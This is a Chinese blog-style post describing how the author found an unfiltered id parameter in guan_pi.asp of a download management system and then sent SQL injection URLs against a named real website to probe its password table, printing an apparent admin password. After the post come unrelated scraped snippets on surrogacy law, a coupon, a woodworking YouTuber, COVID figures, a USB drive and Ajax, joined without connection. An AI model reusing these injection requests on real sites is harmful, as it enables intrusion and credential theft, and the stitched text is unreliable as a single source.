看了N.E.V.E.R写的很多关于sql injection的文章后,很有感触,真佩服他能耐心看得下那么多的代码,并能发现那么多的漏洞。在他的感染下,我也试着看一些代码,复杂的代码不看,我看些简单的:先看看书生下载管理系统吧,我看的是5.5版的,应该是最新版的吧。我也来”倒“着看(实际上是在床上看),哈哈~~ ^-^先看看soft.asp吧,看这个dim zhuid,typeid,types,zhuid = Request.QueryString("id")if id="" or not IsNumeric(id) thenResponse.Write("错误参数")Response.Endelse好象对id过滤很严哦反正我从这里是下不了手的,主要是因为我很笨!后来看着看着就睡着了,醒来后,突然眼睛一亮发现一个guan_pi.asp文件,里面是这样写的dim sql,rsdim tempdim idim idid=request("id")set rs=server.createobject("adodb.recordset")sql="select review,title,reviewcount from learning where articleid="&idrs.open sql,conn,1,1%>用never的话说,这是最垃圾的写法。对id没有做任何过滤哈哈,看样子有戏了!提交:http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1) ---------对此站点的管理员持抱歉态度接下来应该是最熟悉的:http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1%20and%20name='admin')http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1%20and%20password='19831112.520') ---这个密码挺有意思的,典型的中国密码 我想找找官方网站,好象打不开,就算了,以后再去找吧。恩,继续睡觉
在国内花钱找人生孩子是犯法的。如果想找人代孕的话,最好还是跑去国外,国外有很多国家是允许的,合法的。但是小孩生出来没有父母是很可怜的,最好是找。 我国现行法律还不允许实施代孕技术。因为这一问题涉及违反...
更新:优惠券已酿成满50-8了,流动失效。 谢谢论坛网友“xsyxx00009”分享,更多优异内容请接见本站论坛。 360好药是360旗下的医药品牌,全新改版。 看了一下功效做得不错,直接搜索病...
最近, 63 岁的阿木爷爷凭借一双巧手在YouTube走红。不用任何现代机械工具,就能徒手打造鲁班凳、苹果锁、拱桥、将军案、会动的小猪佩奇等木制品。其YouTube频道播放量已经突破 2 亿,被网友称...
新华社马尼拉12月14日电(记者袁梦晨 杨柯)菲律宾卫生部14日公布的数据显示,该国累计新冠确诊病例已超过45万例。随着圣诞节和新年假期临近,菲律宾专家提醒民众不要放松警惕,谨防疫情恶化。 ...
西班牙生产商Deonet公布了一款非常非常迷你型的U盘,称为是“世界上最小的USB储存设备”,总体规格仅为19.5×14.5×2.9mm。在这以前,Kingmax...
本文目录一览: 1、关于ajax的安全问题,语句为$.post("delete.ashx",{"id":id});,如 2、一分钟学会什么是Ajax及Ajax请求的五个步骤 3、用ajax实现...